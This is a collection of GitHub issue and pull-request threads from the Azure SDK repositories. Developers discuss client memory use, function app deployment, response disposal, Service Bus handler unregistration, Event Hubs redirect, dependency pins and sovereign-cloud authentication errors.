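The single-client pattern is the same across languages; a minimal sketch in the Python queues package (azure-storage-queue), for illustration:

from azure.storage.queue import QueueClient

# create once at startup and share for the process lifetime;
# the clients are thread-safe, so one instance is enough.
queue_client = QueueClient.from_connection_string("<connection-string>", "<queue-name>")

def poll_once():
    for message in queue_client.receive_messages():
        print(message.content)
        queue_client.delete_message(message)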
We're tracking getting this documented for all clients in this issue. https://github.com/Azure/azure-sdk-for-net/issues/8941.
Hi there
We understand the recommended way is to use a single client, but isn't it still a bug that memory leaks when many clients are created?
In our specific case, we created a lot of clients for an hour or so at night and the memory is never released, even days after.
We will use a single client in the future, so thanks to @speedy-ms
Thanks
Phil
|
2025-04-01T06:36:45.342209
| 2023-03-20T08:02:05
|
1631585358
|
{
"authors": [
"Arvinorange",
"jsquire",
"live1206"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:349",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/issues/35002"
}
|
gharchive/issue
|
[QUERY] Azure .NET SDK for web app/function app creation and deployment
Library name and version
Microsoft.Azure.Management.AppService
Query/Question
Hi,
I would like to do the below commands from the CLI in the SDK instead.
$'az functionapp create -p {_appPlanName} --name {_globalFunctionName} --resource-group {_resourceGroupName} --runtime dotnet --storage-account {_storageAccountName} --functions-version 4'
$'az functionapp deployment source config-zip -g {_resourceGroupName} -n {_globalFunctionName} --src {_zipName}'
It looks like the Microsoft.Azure.Management.AppService SDK can create and deploy a web app, but there's no example for this. Could you please share some examples of C# SDK creation of an Azure Function, SDK deployment of an Azure Function, and SDK deployment of a web app?
Thanks
Environment
No response
A function app is one kind of web site.
Here is an example of web site creation. You need to set Kind to functionapp to create a function app, and you might experiment more to fit the settings for a function app into WebSiteData.
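For illustration, the equivalent flow in the Python management SDK (azure-mgmt-web), using the same Kind trick; treat the exact property set needed for a working function app as an assumption:

from azure.identity import DefaultAzureCredential
from azure.mgmt.web import WebSiteManagementClient
from azure.mgmt.web.models import NameValuePair, Site, SiteConfig

client = WebSiteManagementClient(DefaultAzureCredential(), "<subscription-id>")
poller = client.web_apps.begin_create_or_update(
    "<resource-group>",
    "<function-app-name>",
    Site(
        location="westus2",
        kind="functionapp",  # the Kind setting discussed above
        server_farm_id="<app-service-plan-id>",
        site_config=SiteConfig(
            app_settings=[NameValuePair(name="FUNCTIONS_EXTENSION_VERSION", value="~4")]
        ),
    ),
)
site = poller.result()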
I did not find any SDK regarding the deployment though.
It requires details of the service itself, so it would be best to involve the service team to provide a sample of the usage.
@jsquire Could you please help route this issue to service team for further assistance?
@live1206 : Service teams do not generally provide samples based on our SDKs. This is something that our team would own and coordinate with the service team directly, if needed. Please work with @ArthurMa1978 to determine next steps.
Hi @Arvinorange. Unfortunately, this repository is focused on the Azure SDK for .NET, service teams do not monitor these issues. To involve the service team, your best path forward would be to open an Azure support request.
@live1206 : Service teams do not generally provide samples based on our SDKs. This is something that our team would own and coordinate with the service team directly, if needed. Please work with @ArthurMa1978 to determine next steps.
@jsquire AFAIK, the sample of how to use the SDK for a specific scenario is auto-generated based on examples in the Spec repo.
The service team needs to provide us a detailed example of the request and response for how to create a function app.
If we take a look at the example of CreateOrUpdateStaticSiteBuildFunctionAppSettings, it generated a sample CreateOrUpdateAppSettings_CreatesOrUpdatesTheFunctionAppSettingsOfAStaticSiteBuild, which does not provide any details regarding how to create a function app with .NET SDK.
I have checked with @ArthurMa1978 we can't do anything here if the service team doesn't provide the scenario example with details.
|
2025-04-01T06:36:45.352585
| 2019-08-13T22:11:14
|
480393080
|
{
"authors": [
"j82w",
"pakrym"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:350",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/issues/7286"
}
|
gharchive/issue
|
[BUG] Azure.Core.ResponseOfT contains disposable Response
Describe the bug
Response<T> contains a disposable Response property. There is no way to dispose of the inner Response object. This is a memory leak and will cause additional overhead for garbage collection.
Information Checklist
Kindly make sure that you have added all the following information above and checked off the required fields, otherwise we will treat the issue as an incomplete report
[x] Bug Description Added
[x] Repro Steps Added
[x] Setup information Added
@pakrym this is related to the recent PR
Not disposing a reference doesn't cause a memory leak as long as it doesn't hold any common/unmanaged resources without having a finalizer.
In the case of the Response the only part that holds onto shared resource is the content stream. It also depends if response buffering is enabled:
In the case where buffering is enabled the process of buffering itself would dispose the underlying stream and avoid resource leak, buffered stream is just a memory stream and can be collected.
In the case where buffering is disabled, it's the client's responsibility to either dispose the Response it got from the pipeline or return Response<T> where T is IDisposable, so the consumer of the client SDK has to dispose the value.
In addition not disposing something doesn't add any GC overhead because no matter if an object is disposed GC still has to walk the graph and collect it.
Response ContentStream is a Stream. There is no guarantee that it is a MemoryStream. Does Response need to be updated to be MemoryStream instead of Stream?
How will users know that there is inner property that needs to be disposed of?
Would a better solution be to use Memory or Span instead of Stream? It would remove all the dispose logic and it would give better performance.
The response should be able to handle both buffered and streamed responses, Memory or MemoryStream would only work for buffered responses.
We know that Response.ContentStream would be MemoryStream for buffered responses because we control the buffering logic and create the stream.
Any reason not to make ChannelEnumerableSubscription itself IAsyncEnumerator ?
My issue with this is that it depends on an implementation detail, and not the contract. If someone changes that implementation in the future then this will be broken. There is also no way for users to know if they need to dispose of the inner stream or not.
What scenario requires supporting stream? Would users actually get better use out of always having a buffered Memory object?
My issue with this is that it depends on an implementation detail, and not the contract. If someone changes that implementation in the future then this will be broken. There is also no way for users to know if they need to dispose of the inner stream or not.
Users never have to dispose the inner stream. Users only need to dispose something when the return type is Response<T> where T is IDisposable; then they have to dispose response.Value.
What scenario requires supporting stream? Would users actually get better use out of always having a buffered Memory object?
Downloading large files from blob storage, for example.
Users never have to dispose the inner stream. Users only need to dispose something when the return type is Response<T> where T is IDisposable; then they have to dispose response.Value.
I'm a little confused here. Response<T> has an inner Response object that is disposable. If Response contains a network or some other Stream type that needs to be disposed of, how is it getting disposed of?
I'm a little confused here. Response<T> has an inner Response object that is disposable. If Response contains a network stream or some other stream type that needs to be disposed of, how is it getting disposed of?
We are controlling the clients and the pipeline and wouldn't return Response that has a network stream in it.
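The distinction being drawn maps onto a familiar pattern; a small Python sketch of buffered versus streamed payloads, for illustration only:

import io
import urllib.request

# Buffered: the whole payload lives in memory; letting the GC reclaim it is
# enough, which mirrors the buffered-Response case above.
buffered = io.BytesIO(b"payload")
data = buffered.read()

# Streamed: wraps a live network resource and must be closed explicitly,
# which mirrors why a streaming response (or a disposable T) needs disposing.
with urllib.request.urlopen("https://example.com") as stream:
    first_chunk = stream.read(1024)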
|
2025-04-01T06:36:45.363122
| 2020-08-06T22:54:54
|
674646306
|
{
"authors": [
"DorothySun216",
"RicoBakels",
"SeanFeldman",
"sidkri"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:351",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/pull/14021"
}
|
gharchive/pull-request
|
Enable a way to Unregister Message Handler and Session Handler
Currently our SDK doesn't support a way to unregister a message handler or session handler, so customers get ObjectDisposedException when receivers are closed because the connection was closed by regular application upgrades, etc. This exposes functionality to unregister a handler and await pending receive and message-handling operations, allowing a graceful unregister of the previously registered handler. Customers are expected to call this function before they close down their handler. Customers can register again after unregistering, as they are independent operations.
Is there an issue that discusses this change? Given this is a new feature I'd expect to see some transparency about it.
/cc @JoshLove-msft @jsquire
@SeanFeldman Hi Sean! Thanks for your comments. This is only a draft PR. This is a feature request from Azure Functions team. I will create an issue to discuss this to allow more transparency in design.
I have validated a version of these changes (commit "fbd31d0") with Azure Functions Service Bus extension and did not find any issues. Tested the following methods:
QueueClient.UnregisterSessionHandlerAsync(TimeSpan)
SubscriptionClient.UnregisterSessionHandlerAsync(TimeSpan)
MessageReceiver.UnregisterMessageHandlerAsync(TimeSpan)
I also attempted to call SubscriptionClient.RegisterSessionHandler() while SubscriptionClient.UnregisterSessionHandlerAsync(TimeSpan) was processing and got an exception as expected. Calling RegisterSessionHandler() after UnregisterSessionHandlerAsync(TimeSpan) completed worked normally as expected.
Nice work @DorothySun216! Approving from my side.
used version: 4.2.1
I want to use UnregisterMessageHandler to "pause" the ISubscriptionClient. aka stop processing messages from the Service Bus for a while. The only problem I encounter, is that after I unregister and try to re-register a handler, the runningTaskCancellationTokenSource in MessageReceiver.cs does not get a new instance, but keeps using the disposed one. That is why I get the following exception:
System.ObjectDisposedException: The CancellationTokenSource has been disposed.
Suggestion to also re-instantiate the runningTaskCancellationTokenSource just like the receivePumpCancellationTokenSource in MessageReceiver.cs (line 1333).
@RicoBakels thanks for reaching out. Are you using our service bus SDK directly or using Azure Functions?
@DorothySun216 I am using the service bus SDK
@RicoBakels I see. I will work on a repro. Can you show a code snippet for your use case if it is convenient?
@DorothySun216 Thanks for the fast reply. Here is a code snipped where I use the ISubscriptionClient in my class.
At startup of the (Service Fabric) service, the message handler will get registered with the OpenAsync method. When for some reason the service needs to stop handling messages from the Service Bus for a while, the service pauses the handling of messages by calling the Pause method.
Then when the service needs to start handling messages again, I call the OpenAsync method again to register the handler.
// (re-)register message handler.
public Task<string> OpenAsync(CancellationToken cancellationToken)
{
_logger.LogInformation("AzureServiceBusReaderService starting");
var messageHandlerOptions = new MessageHandlerOptions(ExceptionReceivedHandlerAsync)
{
MaxConcurrentCalls = 1,
AutoComplete = false
};
_subscriptionClient.RegisterMessageHandler(ProcessMessagesAsync, messageHandlerOptions);
return Task.FromResult(_subscriptionClient.SubscriptionName);
}
// Unregister message handler so messages won't get picked up from Service Bus.
public void Pause() => _subscriptionClient.UnregisterMessageHandlerAsync(TimeSpan.FromSeconds(1));
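A rough Python analog of this pause/resume pattern (azure-servicebus), where resuming builds a fresh receiver instead of re-registering a handler, sidestepping the disposed-token problem described above:

from azure.servicebus import ServiceBusClient

client = ServiceBusClient.from_connection_string("<connection-string>")

def make_receiver():
    return client.get_subscription_receiver("<topic>", "<subscription>")

receiver = make_receiver()
for message in receiver:
    receiver.complete_message(message)
    break  # some pause condition was met

receiver.close()            # "pause": stop pumping messages
receiver = make_receiver()  # "resume": a fresh receiver, not the closed one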
|
2025-04-01T06:36:45.365341
| 2023-06-21T20:33:07
|
1768431109
|
{
"authors": [
"amnguye",
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:352",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/pull/37153"
}
|
gharchive/pull-request
|
Created wrapper class which contains information to rehydrate
Moved around dependencies, job plan models to create Checkpointer internally as well.
API change check
APIView has identified API level changes in this PR and created following API reviews.
Azure.Storage.DataMovement
|
2025-04-01T06:36:45.366427
| 2023-11-14T00:51:38
|
1991741851
|
{
"authors": [
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:353",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/pull/39967"
}
|
gharchive/pull-request
|
Increment version for storage releases
Increment package version after release of Azure.Storage.Common
API change check
API changes are not detected in this pull request.
|
2025-04-01T06:36:45.369962
| 2024-03-12T21:30:15
|
2182714546
|
{
"authors": [
"azure-sdk",
"fangchen0601"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:354",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/pull/42642"
}
|
gharchive/pull-request
|
[ACS][CallAutomation]Move SourceCallerIdNumber from Answer to Transfer api
Contributing to the Azure SDK
Please see our CONTRIBUTING.md if you are not familiar with contributing to this repository or have questions.
For specific information about pull request etiquette and best practices, see this section.
Ran autorest to update a lot of models, including the media team's work
In CallMedia.cs, StartHoldMusicAsync and StartHoldMusic are updated to pass the build, and a comment was left for the media team to work on StartHoldMusicOptions.Loop and operationCallbackUri
Move SourceCallerIdNumber from Answer to Transfer api
API change check
APIView has identified API level changes in this PR and created following API reviews.
Azure.Communication.CallAutomation
|
2025-04-01T06:36:45.372859
| 2024-06-05T03:03:22
|
2334798863
|
{
"authors": [
"azure-sdk",
"yuc-Li"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:355",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/pull/44393"
}
|
gharchive/pull-request
|
[HDInsight on AKS] Api version 2024-05-01 support
Contributing to the Azure SDK
Support api version 2024-05-01.
Preview to Stable.
Please see our CONTRIBUTING.md if you are not familiar with contributing to this repository or have questions.
For specific information about pull request etiquette and best practices, see this section.
API change check
APIView has identified API level changes in this PR and created following API reviews.
Azure.ResourceManager.HDInsight.Containers
The GA plan has changed. Stop this thread. Thanks.
|
2025-04-01T06:36:45.375262
| 2024-09-20T23:45:43
|
2539821981
|
{
"authors": [
"KrzysztofCwalina",
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:356",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/pull/46106"
}
|
gharchive/pull-request
|
AZD-CM integration
Added the ability to provision CDK CM infrastructure using azd.
Steps to try it:
Execute the CloudMachineTests.Configure (this will create bicep files from the CM CDK)
In the test's bin folder, run azd init
pick "Minimal" template
you can now do azd provision
API change check
APIView has identified API level changes in this PR and created following API reviews.
Azure.Provisioning.CloudMachine
|
2025-04-01T06:36:45.386272
| 2020-03-13T17:56:48
|
580757152
|
{
"authors": [
"chradek",
"yunhaoling"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:357",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/issues/10296"
}
|
gharchive/issue
|
[event hubs] support receiver redirect
Background
The Event Hubs service supports redirects for amqp receiver links. When the client creates an amqp receiver link with redirects enabled, the service will respond with an amqp:link:redirect error if it also supports redirects. The error contains the information needed to create a new connection to the service.
The main benefit of receiver redirect is it allows a more direct connection to the host actually sending events to the client which should reduce latency.
API changes
The Event Hub clients responsible for consuming events (e.g. EventHubConsumerClient) should accept a new option to enable redirect that has a default value of false.
Proposal:
{ enableRedirect: true } // new option 'enableRedirect'
Reasoning
It is important to make this option opt-in for 2 reasons:
Currently 1 client creates 1 connection. This changes that assumption: 1 client can create many connections. This has implications since there is a limit to the number of connections that can be open at one time to an Event Hub.
By default the SDK speaks AMQP over ports 5671/5672. With redirect enabled, new connections may be made on ports 104xx. Users may need to update their firewall rules to support redirect:
https://docs.microsoft.com/en-us/azure/service-bus-messaging/service-bus-amqp-protocol-guide#amqp-outbound-port-requirements
Details
Redirect walkthrough
User instantiates a consumer client with redirect enabled.
User makes call to receive events (this causes a receiver link to be created using customer-provided credential/host info).
Connection/cbs session/receiver link are created.
The receiver link must have amqp:link:redirect included in the list of desired_capabilities if redirect is enabled.
This must be omitted if redirect is not enabled.
The receiver link receives a LinkRedirectError.
The SDK parses the hostname/port/address info from the error.
A new amqp connection is created using the hostname/port from the error.
When the cbs session is created, the applicationProperties.name value should be the address extracted from the LinkRedirectError.
The SDK creates the receiver link on the new connection and begins receiving events.
Considerations
It is possible for every receiver link to have different hostname/port/address values from one another in the LinkRedirectError. You may create a new connection for every LinkRedirectError. Optionally, you may use a connection for multiple receiver links if the links share a hostname/port.
Creating a new connection for each redirect is simpler to implement because it is easier to know when the connection should be closed, but does potentially increase connection density.
When to re-use the original connection?
It is possible that the server node used for receiving events can change. When the SDK sees an amqp:connection:forced error from the service, or the connection is closed, then the original connection should be used to create a new receiver link. At this point a new LinkRedirectError should be received and the redirect walkthrough can be followed.
Otherwise, for transient issues the connection created for the link after a LinkRedirectError can be re-used.
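To make the walkthrough concrete, a heavily simplified sketch; connect(), open_receiver(), and this LinkRedirectError are hypothetical stand-ins for the SDK's internal AMQP layer, not real APIs:

class LinkRedirectError(Exception):
    def __init__(self, hostname, port, address):
        self.hostname, self.port, self.address = hostname, port, address

def attach_with_redirect(connect, open_receiver, host, port, address):
    conn = connect(host, port)
    try:
        # advertise redirect support on the link (step 4 above)
        return conn, open_receiver(conn, address,
                                   desired_capabilities=["amqp:link:redirect"])
    except LinkRedirectError as err:
        conn.close()
        # follow the redirect: new connection to the host from the error,
        # receiver re-created against the redirected address (steps 6-9)
        redirected = connect(err.hostname, err.port)
        return redirected, open_receiver(redirected, err.address)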
Reference
There is a draft PR for the JavaScript SDK that has the basics implemented for this feature.
https://github.com/Azure/azure-sdk-for-js/pull/7782
goal for April: design
|
2025-04-01T06:36:45.400303
| 2021-01-26T19:14:31
|
794491432
|
{
"authors": [
"00Kai0",
"ludokriss",
"xiangyan99"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:358",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/issues/16356"
}
|
gharchive/issue
|
[API Management Management] Impossible to create new API using sdk
Package Name: Azure management Api Management
Package Version: 1.0.0
Operating System: Windows
Python Version: 3.7
Describe the bug
It seems as if the API Management client has a bug when trying to create or update an API. The package tries to poll for a result but includes unnecessary data in the request, which throws an error in the aiohttp package.
To Reproduce
Steps to reproduce the behavior:
Create a client for interacting with API management
creds = DefaultAzureCredential()
client = ApiManagementClient(
credential=creds, subscription_id=settings.subscription_id
)
create a version set
api_version_set=client.api_version_set.create_or_update(
resource_group_name=settings.resource_group_name,
service_name=settings.api_management_name,
version_set_id="anystuff",
parameters=ApiVersionSetContract(
display_name="title",
versioning_scheme="Segment",
description="Version configuration",
),
)
And then create any form of API.
api=client.api.begin_create_or_update(
resource_group_name=settings.resource_group_name,
service_name=settings.api_management_name,
api_id="wss-mp-test-order",
parameters=get_parameters(oai, api_version_set.id),
)
This throws an error:
return _RequestContextManager(self._request(method, url, **kwargs))
TypeError: _request() got an unexpected keyword argument 'path_format_arguments'
which, as far as I can see, results from these lines in the sdk:
https://github.com/Azure/azure-sdk-for-python/blob/79a64bb9d40610d1696819a2595a49d18d7a7ad6/sdk/apimanagement/azure-mgmt-apimanagement/azure/mgmt/apimanagement/aio/operations/_api_operations.py#L420-L427
where the path_format_arguments are interpreted in the end as parameters to the GET request polling for a result.
Expected behavior
A created API and successful response in the code
Screenshots
N/A
Additional context
I had to upgrade from 0.2.0 because of a different set of bugs (not reported yet, but at least one still persists). Now everything broke, even the things that I had a workaround for before.
Hi @ludokriss, this version of the SDK is using a preview version of the API.
It seems that something has changed on the service side.
We will update it in the near future.
@00Kai0 any updates?
|
2025-04-01T06:36:45.407320
| 2018-05-29T14:07:48
|
327337214
|
{
"authors": [
"ageorgou",
"lmazuel"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:359",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/issues/2644"
}
|
gharchive/issue
|
Incorrect requirement for azure.mgmt.compute
It seems that the version requirement for azure-common~=1.1 in azure.mgmt.compute is too broad: new versions of the package reference azure.profiles, which was introduced in azure-common 1.1.9.
For example, if I try to install the latest version (4.0.0rc2) of azure.mgmt.compute in an environment which already has an older version of azure-common, the installation completes successfully but I can't import anything from the new package.
Steps to reproduce:
From a clean environment, install an older version of azure-common, then install the latest azure.mgmt.compute from source.
pip install "azure-common<=1.1.8"
git clone https://github.com/Azure/azure-sdk-for-python.git
pip install azure-sdk-for-python/azure-mgmt-compute
In a Python console, import the new package.
>>> import azure.mgmt.compute
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/Users/ageorgou/anaconda/envs/test-azure/lib/python3.6/site-packages/azure/mgmt/compute/__init__.py", line 8, in <module>
from .compute_management_client import ComputeManagementClient
File "/Users/ageorgou/anaconda/envs/test-azure/lib/python3.6/site-packages/azure/mgmt/compute/compute_management_client.py", line 16, in <module>
from azure.profiles import KnownProfiles, ProfileDefinition
ModuleNotFoundError: No module named 'azure.profiles'
Expected behaviour is for the import to work, as it successfully does with newer (>=1.1.9) versions of azure-common.
Hi @ageorgou
Yes you're right, I should write ~=1.1;>=1.1.9. I didn't notice since I do fresh env each time, but on update it won't work. Will fix it asap. Thanks!
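For illustration, a constraint along these lines in the affected package's setup.py would express the dependency; the exact specifier used in the merged fix may differ.
# Hypothetical excerpt from setup.py of a package that imports azure.profiles
install_requires = [
    "azure-common>=1.1.9,<2.0",  # azure.profiles was introduced in azure-common 1.1.9
]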
Hi @lmazuel,
Yes, I only noticed this when updating an existing installation.
I was looking at this again and realised that it happens in other packages too. A quick search (grep "azure.profiles") shows:
azure-mgmt-compute
azure-mgmt-resource
azure-mgmt-storage
azure-mgmt-network
azure-mgmt-containerregistry
The last two already require specific versions. I have submitted a PR for the other three in case that makes things easier, but please feel free to ignore it if not!
Hi @ageorgou
I released storage this morning including the fix, so your PR conflicts :/. If you could remove storage from your PR, I'll merge it.
Thanks!
Hi @lmazuel, done now.
|
2025-04-01T06:36:45.457843
| 2022-10-25T21:51:05
|
1423159972
|
{
"authors": [
"adrian-gonzalez",
"harneetvirk",
"kottofy",
"xiangyan99"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:360",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/issues/27038"
}
|
gharchive/issue
|
Failing to find Subscription ID when targeting AzureUSGovernment Tenant
Package Name: MLClient
Package Version: SDK V2
Operating System: AML Compute Instance STANDARD_DS11_V2
Python Version: Python 3.10
Describe the bug
After initializing an instance of MLClient, executing any of its methods results in the error below.
To Reproduce
Steps to reproduce the behavior:
Pre-requirements:
Have an AzureUSGovernment tenant and subscription
Have an AML Workspace created, along with a Compute Instance
Have a Service Principal created in the above subscription, and given a "Contributor" role assignment to the AML Workspace
Run a notebook in AML using the compute instance, and update the placeholder environment variables:
from azure.ai.ml.entities import AmlCompute
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential, AzureAuthorityHosts, EnvironmentCredential
import os
import traceback
# Set ENV Variables
os.environ["AZURE_CLIENT_SECRET"] = "<value>"
os.environ["AZURE_CLIENT_ID"] = "<value>"
os.environ["AZURE_TENANT_ID"] = "<value>"
os.environ["AZURE_AUTHORITY_HOST"] = AzureAuthorityHosts.AZURE_GOVERNMENT
credentials = DefaultAzureCredential(
interactive_browser_tenant_id=os.environ["AZURE_TENANT_ID"],
authority=AzureAuthorityHosts.AZURE_GOVERNMENT
)
ml_client = MLClient(
credential=credentials,
subscription_id="<value>",
resource_group_name="<value>",
workspace_name="<value>",
cloud="AzureUSGovernment",
)
# Name assigned to the compute cluster
cpu_compute_target = "cpu-cluster-2"
try:
# let's see if the compute target already exists
cpu_cluster = ml_client.compute.get(cpu_compute_target)
print(
f"You already have a cluster named {cpu_compute_target}, we'll reuse it as is."
)
except Exception:
print("Creating a new cpu compute target...")
# Let's create the Azure ML compute object with the intended parameters
cpu_cluster = AmlCompute(
name=cpu_compute_target,
# Azure ML Compute is the on-demand VM service
type="amlcompute",
# VM Family
size="STANDARD_DS3_V2",
# Minimum running nodes when there is no job running
min_instances=0,
# Nodes in cluster
max_instances=4,
# How many seconds will the node running after the job termination
idle_time_before_scale_down=180,
# Dedicated or LowPriority. The latter is cheaper but there is a chance of job termination
tier="Dedicated",
)
# Now, we pass the object to MLClient's create_or_update method
cpu_cluster = ml_client.compute.begin_create_or_update(cpu_cluster)
print(
f"AMLCompute with name {cpu_cluster.name} is created, the compute size is {cpu_cluster.size}"
)
Expected behavior
The above code should result in either a new CPU Cluster being created, or printing out the message You already have a cluster named {cpu_compute_target}, we'll reuse it as is."
Screenshots
The actual behavior is an error:
ResourceNotFoundError: (SubscriptionNotFound) The subscription 'xxxxxxxxxxxxxxxx' could not be found.
Code: SubscriptionNotFound
Message: The subscription 'xxxxxxxxxxxxxxxx' could not be found.
The stack trace is:
Creating a new cpu compute target...
---------------------------------------------------------------------------
ResourceNotFoundError Traceback (most recent call last)
Input In [8], in <cell line: 13>()
13 try:
14 # let's see if the compute target already exists
---> 15 cpu_cluster = ml_client_6.compute.get(cpu_compute_target)
16 print(
17 f"You already have a cluster named {cpu_compute_target}, we'll reuse it as is."
18 )
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_telemetry/activity.py:169, in monitor_with_activity.<locals>.monitor.<locals>.wrapper(*args, **kwargs)
168 with log_activity(logger, activity_name or f.__name__, activity_type, custom_dimensions):
--> 169 return f(*args, **kwargs)
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_operations/compute_operations.py:75, in ComputeOperations.get(self, name)
67 """Get a compute resource
68
69 :param name: Name of the compute
(...)
72 :rtype: Compute
73 """
---> 75 response, rest_obj = self._operation.get(
76 self._operation_scope.resource_group_name,
77 self._workspace_name,
78 name,
79 cls=get_http_response_and_deserialized_from_pipeline_response,
80 )
81 # TODO: Remove warning logging after 05/31/2022 (Task 1776012)
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/core/tracing/decorator.py:83, in distributed_trace.<locals>.decorator.<locals>.wrapper_use_tracer(*args, **kwargs)
82 if span_impl_type is None:
---> 83 return func(*args, **kwargs)
85 # Merge span is parameter is set, but only if no explicit parent are passed
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_restclient/v2022_01_01_preview/operations/_compute_operations.py:577, in ComputeOperations.get(self, resource_group_name, workspace_name, compute_name, **kwargs)
576 if response.status_code not in [200]:
--> 577 map_error(status_code=response.status_code, response=response, error_map=error_map)
578 error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/core/exceptions.py:105, in map_error(status_code, response, error_map)
104 error = error_type(response=response)
--> 105 raise error
ResourceNotFoundError: (SubscriptionNotFound) The subscription '50ff9458-6372-4522-8227-327043deaef5' could not be found.
Code: SubscriptionNotFound
Message: The subscription '50ff9458-6372-4522-8227-327043deaef5' could not be found.
During handling of the above exception, another exception occurred:
ResourceNotFoundError Traceback (most recent call last)
Input In [8], in <cell line: 13>()
24 cpu_cluster = AmlCompute(
25 name=cpu_compute_target,
26 # Azure ML Compute is the on-demand VM service
(...)
37 tier="Dedicated",
38 )
40 # Now, we pass the object to MLClient's create_or_update method
---> 41 cpu_cluster = ml_client_6.compute.begin_create_or_update(cpu_cluster)
43 print(
44 f"AMLCompute with name {cpu_cluster.name} is created, the compute size is {cpu_cluster.size}"
45 )
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_telemetry/activity.py:169, in monitor_with_activity.<locals>.monitor.<locals>.wrapper(*args, **kwargs)
166 @functools.wraps(f)
167 def wrapper(*args, **kwargs):
168 with log_activity(logger, activity_name or f.__name__, activity_type, custom_dimensions):
--> 169 return f(*args, **kwargs)
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_operations/compute_operations.py:116, in ComputeOperations.begin_create_or_update(self, compute, **kwargs)
107 @monitor_with_activity(logger, "Compute.BeginCreateOrUpdate", ActivityType.PUBLICAPI)
108 def begin_create_or_update(self, compute: Compute, **kwargs: Any) -> LROPoller:
109 """Create a compute
110
111 :param compute: Compute definition.
(...)
114 :rtype: LROPoller
115 """
--> 116 compute.location = self._get_workspace_location()
117 compute._set_full_subnet_name(self._operation_scope.subscription_id, self._operation_scope.resource_group_name)
119 compute_rest_obj = compute._to_rest_object()
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_operations/compute_operations.py:308, in ComputeOperations._get_workspace_location(self)
307 def _get_workspace_location(self) -> str:
--> 308 workspace = self._workspace_operations.get(self._resource_group_name, self._workspace_name)
309 return workspace.location
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/core/tracing/decorator.py:83, in distributed_trace.<locals>.decorator.<locals>.wrapper_use_tracer(*args, **kwargs)
81 span_impl_type = settings.tracing_implementation()
82 if span_impl_type is None:
---> 83 return func(*args, **kwargs)
85 # Merge span is parameter is set, but only if no explicit parent are passed
86 if merge_span and not passed_in_parent:
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_restclient/v2022_01_01_preview/operations/_workspaces_operations.py:615, in WorkspacesOperations.get(self, resource_group_name, workspace_name, **kwargs)
612 response = pipeline_response.http_response
614 if response.status_code not in [200]:
--> 615 map_error(status_code=response.status_code, response=response, error_map=error_map)
616 error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
617 raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/core/exceptions.py:105, in map_error(status_code, response, error_map)
103 return
104 error = error_type(response=response)
--> 105 raise error
Additional context
I looked through the source code in _azure_environments.py file and also the _ml_client.py file to infer what environment variables and values I needed to pass into the MLClient constructor. However, something doesn't appear to be working correctly.
Here is an example for running a notebook in Non-public cloud: https://github.com/Azure/azureml-examples/blob/main/sdk/python/jobs/multicloud-configuration.ipynb
You may need to pass the cloud name in the kwargs for MLClient.
# NOTE: cloud parameter is required in kwargs to signal mlclient to connect to the appropriate endpoints in Azure.
kwargs = {"cloud": "AzureChinaCloud"}
ml_client = MLClient(credential, subscription_id, resource_group, **kwargs)
Hi @harneetvirk , unfortunately I am still facing the same error.
